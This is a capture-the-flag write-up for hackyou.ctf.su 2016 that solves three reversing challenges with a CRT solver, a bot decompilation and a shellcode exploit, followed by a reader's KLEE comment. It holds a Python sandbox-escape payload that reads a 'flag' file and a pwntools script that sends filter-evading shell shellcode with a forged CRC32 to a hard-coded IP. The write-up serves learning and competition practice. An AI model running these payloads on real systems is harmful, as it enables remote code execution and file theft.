hackyou.ctf.su 2016

This is my write-up for the recent hack you spb CTF, a CTF for newbies. I guess I'm a bit older here ahaha.

Reverse 100:

#include <stdio.h>
#include <string.h>

int main() {
	char buf[64];
	gets(buf);
	int l = strlen(buf);
	if (l * l != 144)
		return 1;
	unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16);
	unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16);
	unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16);
	unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16);
	if (!(((a % 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059))))
		return 2;
	if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931))))
		return 3;
	if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651))))
		return 4;
	if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510))))
		return 5;
	printf("Congratulations %s is flag\n",buf);
	return 0;
}

First of all, I thought about using something like z3, or any SAT solver that could give me the valid numbers. But z3 took a lot of time, so I decided to look deeper... Yes, you can figure out that there is a pattern (x % number1 == number2), so you can apply the Chinese remainder theorem to get a, b, c.
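The CRT step worked through, as an added example (not the author's code): the moduli are not all pairwise coprime (99892 and 24497 share the factor 17, and all three moduli for d are divisible by 3), so it uses the generalised CRT that merges two congruences through their gcd and rejects inconsistent pairs, rather than the textbook coprime version. It assumes the flag bytes are ASCII, so each packed word a, b, c, d is below 2^24 and the solution is unique in that range.

```python
from math import gcd

# Residue checks copied from the challenge: value % modulus == remainder.
CHECKS = {
    "a": [(3571, 2963), (2843, 215), (30243, 13059)],
    "b": [(80735, 51964), (8681, 2552), (40624, 30931)],
    "c": [(99892, 92228), (45629, 1080), (24497, 12651)],
    "d": [(54750, 26981), (99627, 79040), (84339, 77510)],
}

def crt_pair(r1, m1, r2, m2):
    """Merge x ≡ r1 (mod m1) and x ≡ r2 (mod m2) without requiring coprime
    moduli: returns (r, lcm), or None if the residues disagree mod gcd."""
    g = gcd(m1, m2)
    if (r2 - r1) % g:
        return None
    lcm = m1 // g * m2
    # m1*t ≡ r2-r1 (mod m2): divide through by g, then invert m1/g mod m2/g
    t = (r2 - r1) // g * pow(m1 // g, -1, m2 // g) % (m2 // g)
    return (r1 + m1 * t) % lcm, lcm

def solve_word(checks, bound=1 << 24):
    """Every value below `bound` satisfying all (modulus, remainder) checks.
    The bound assumes ASCII input, so each 3-byte packed word is < 2**24."""
    r, m = 0, 1
    for mod, rem in checks:
        merged = crt_pair(r, m, rem, mod)
        if merged is None:            # the system is inconsistent
            return []
        r, m = merged
    return list(range(r, bound, m))

def solve_reverse100():
    """Rebuild the 12-byte input: word a/b/c/d lives in column col of buf,
    with buf[col], buf[col+4], buf[col+8] as its low, middle and high byte."""
    buf = bytearray(12)
    for col, name in enumerate("abcd"):
        values = solve_word(CHECKS[name])
        if len(values) != 1:          # unsolvable, or ambiguous below the bound
            return None
        for row in range(3):
            buf[col + 4 * row] = (values[0] >> (8 * row)) & 0xFF
    return bytes(buf)

def passes_check(buf):
    """Re-run the challenge's length and modulus tests on a candidate."""
    if len(buf) != 12:
        return False
    for col, name in enumerate("abcd"):
        v = buf[col] | (buf[col + 4] << 8) | (buf[col + 8] << 16)
        if any(v % m != r for m, r in CHECKS[name]):
            return False
    return True
```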

Reverse 200:
This is a .pyc file, which contains Python byte-code. As usual for byte-code related problems, I searched for a Python byte-code decompiler and found pycdc.
After decompiling, you should get something like this:

# Source Generated with Decompyle++
# File: rev200_bot_7b541a1.pyc (Python 2.7)

import config
import traceback
import re
from base64 import *
from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHide
sec_state = { }

def process_message(bot, u):
    if u.message.sender and u.message.text and u.message.chat:
        chat_id = u.message.chat.id
        user = u.message.sender.username
        reply_hide = ReplyKeyboardHide.create()
        print 'user:%s mes:%s' % (user, u.message.text)
        if user not in sec_state:
            sec_state[user] = {
                'mode': 15,
                'stage': 7 }
        cmd1 = u.message.text.encode('utf-8')
        a = re.findall('(\\/\\w+)\\s*(.*)', cmd1)
        if a:
            cmd = a[0][0]
            data = a[0][1]
            if cmd == '/help':
                bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide)
            if cmd == '/enter':
                keyboard = [
                    [
                        '-7-',
                        '-8-',
                        '-9-'],
                    [
                        '-4-',
                        '-5-',
                        '-6-'],
                    [
                        '-1-',
                        '-2-',
                        '-3-'],
                    [
                        '-0-']]
                reply_markup = ReplyKeyboardMarkup.create(keyboard)
                bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait()
            if sec_state[user]['mode'] == 0 and cmd == '/7779317':
                ddd = b64decode(data)
                bot.send_message(chat_id, eval(ddd))
            
        a = re.findall('-(\\d+)-', cmd1)
        if a:
            num = a[0]
            if int(num) == sec_state[user]['stage']:
                sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10
                sec_state[user]['mode'] = sec_state[user]['mode'] - 1
                if sec_state[user]['mode'] < 0:
                    sec_state[user]['mode'] = 0
                if sec_state[user]['mode'] == 0:
                    bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait()
                
            else:
                print 'NO', num, sec_state[user]['stage']
                bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait()
                sec_state[user]['mode'] = 15
        

bot = TelegramBot(config.token)
bot.update_bot_info().wait()
print bot.username
last_update_id = 0
while True:
    updates = bot.get_updates(offset = last_update_id).wait()
    
    try:
        for update in updates:
            if int(update.update_id) > int(last_update_id):
                last_update_id = update.update_id
                process_message(bot, update)
                continue
    except Exception:
        ex = None
        print traceback.format_exc()
        continue
    

So this is a kind of chat-bot server based on Telegram.
There is an eval call inside, bot.send_message(chat_id, eval(ddd)), so I need to control ddd, which is the base64-decoded string of the data we sent. Before that, I need to enter secret mode by entering the correct access codes (0-9).
First, sec_state[user]['mode'] must reach 0. The stage is initialised to 7 and changes every time you press the correct key. If I don't remember the current stage, I can still find it by brute-forcing 0 to 9: if I don't receive the invalid-password message, that means I pressed the correct one. Then, using the following script, I'm able to reach the secret area:

#coding: utf-8
sec_state = { }
user = "A"
sec_state[user] = {
'mode': 15,
'stage': 7 } # bruteforce number
sec_state[user]['mode'] = 15
r = []
while 1:
	num = sec_state[user]['stage']
	r.append(num)
	print "-%d-" % num
	sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10
	sec_state[user]['mode'] = sec_state[user]['mode'] - 1
	if sec_state[user]['mode'] < 0:
	    sec_state[user]['mode'] = 0
	if sec_state[user]['mode'] == 0:
		break

print sec_state[user]['mode']

Next, this is a pyjail, so I can't execute normal Python commands...
So the final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())` or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`

Reverse 300:
Let's have some fun.

Let's reverse this (or not?). Look at handler (the main function):

ssize_t __cdecl handler(int fd)
{
  ssize_t result; // eax@1
  unsigned int buf; // [sp+20h] [bp-18h]@1
  int v3; // [sp+24h] [bp-14h]@1
  char *v4; // [sp+28h] [bp-10h]@4
  int v5; // [sp+2Ch] [bp-Ch]@4

  buf = 0;
  setuid(0x3E8u);
  seteuid(0x3E8u);
  setgid(0x3E8u);
  setegid(0x3E8u);
  result = recv(fd, &buf, 4u, 0);
  v3 = result;
  if ( result == 4 )
  {
    result = buf;
    if ( buf <= 0xC8 )
    {
      v4 = (char *)mmap(0, buf, 7, 33, -1, 0);
      v3 = recv(fd, v4, buf, 0);
      result = crc32(0, v4, buf);
      v5 = result;
      if ( result == 0xCAFEBABE )
      {
        result = filter(v4, buf) ^ 1;
        if ( !(_BYTE)result )
          result = ((int (*)(void))v4)();
      }
    }
  }
  return result;
}

So the basic idea is to make result == 0xCAFEBABE, so the program will execute v4 as shellcode (through the function pointer), but you also need to bypass the filter function, which checks whether the buffer contains any of 0x0, 0x1, 0x2f, 0x68, 0x73 (so I can't use "sh" in plaintext) and exits if it does. So, I did the following steps:

1. Find a program that can make the crc32 of my shellcode equal 0xCAFEBABE.
2. Make a great shellcode and bypass the filter.
By searching Google for everything, the answer to problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploitation methods. Writing shellcode isn't hard (hint: xor), but if there is a framework as good as pwntools, you should try it at least once.
Basically, I import pwn and let pwntools do the rest:

from pwn import *
import socket, struct, telnetlib
def getCRC(data):
	import subprocess
	with open('/tmp/12', 'wb') as f:
		f.write(data + "123456")
	subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1) , 'CAFEBABE'])
	with open('/tmp/12', 'rb') as f:
		data = f.read()
	return data
def crc32(data):# recheck
	import zlib
	return (zlib.crc32(data)) & 0xffffffff


d = ""
d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))
d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))
# i need dup2 because the program use itself as server
d += asm(pwnlib.shellcraft.i386.linux.sh())

fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')

print len(fsc)
fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.
print hex(crc32(fsc))

#yes, i love my custom socket lib 🙁
s = socket.create_connection(("78.46.101.237", 3177))

s.send(p32(len(fsc)))
s.send(fsc)
s.send("\n")

s.send("cat flag*\n") 
print s.recv(1024)
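How the force-crc32 step works, as an added example (not the author's script or the force-crc32 tool): CRC-32 is linear, so appending four chosen bytes steers the checksum to any target, which is why the handler's 0xCAFEBABE comparison cannot distinguish trusted input from anything else. This version appends the patch instead of overwriting four bytes at an offset the way forcecrc32 does, and the sample input in the test is a constructed string, not the challenge payload.

```python
import zlib

POLY = 0xEDB88320  # reflected CRC-32 polynomial, the one zlib.crc32 uses

def _table():
    """Standard reflected CRC-32 lookup table (one entry per input byte)."""
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ POLY if c & 1 else c >> 1
        table.append(c)
    return table

TABLE = _table()
# The top byte of each table entry is unique, which is what makes one CRC
# step reversible: the top byte of the new register identifies the index.
TOP_TO_INDEX = {entry >> 24: i for i, entry in enumerate(TABLE)}

def _unroll_zero_bytes(reg, count=4):
    """Invert `count` zero-byte CRC steps: given the register after them,
    return the register before them."""
    for _ in range(count):
        i = TOP_TO_INDEX[reg >> 24]           # equals (old register) & 0xFF
        reg = ((reg ^ TABLE[i]) << 8) | i      # old = (new ^ TABLE[i]) << 8 | i
    return reg

def force_crc32(data: bytes, target: int) -> bytes:
    """Append four bytes to `data` so that zlib.crc32(result) == target.

    Feeding bytes p0..p3 from register R gives the same result as feeding
    four 0x00 bytes from register R ^ P (P = little-endian int of the four
    bytes), so the patch is R ^ X, where X is the register that lands on
    the wanted final state after four zero bytes."""
    reg = zlib.crc32(data) ^ 0xFFFFFFFF    # undo the final XOR: raw register
    want = target ^ 0xFFFFFFFF             # raw register that yields `target`
    x = _unroll_zero_bytes(want)
    patch = (reg ^ x).to_bytes(4, "little")
    return data + patch

def forged_crc(data: bytes, target: int) -> int:
    """CRC-32 of the patched message; equals `target` for any input."""
    return zlib.crc32(force_crc32(data, target))
```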

To be continued....

2 thoughts on “hackyou.ctf.su 2016”

  1. In the [Reverse 100] problem, another simple way is to use Klee to solve it:

    #include <stdio.h>
    #include <klee/klee.h>   /* klee_make_symbolic, klee_assert */

    #define ITERS 12
    int main() {
        char buf[ITERS];
        klee_make_symbolic(buf, ITERS, "012345");
        unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16);
        unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16);
        unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16);
        unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16);
        if (!(((a % 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059))))
            return 2;
        if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931))))
            return 3;
        if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651))))
            return 4;
        if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510))))
            return 5;
        // printf("Congratulations %s is flag\n",buf);
        klee_assert(0);   /* reaching here means every check passed: KLEE reports the input */
        return 0;
    }
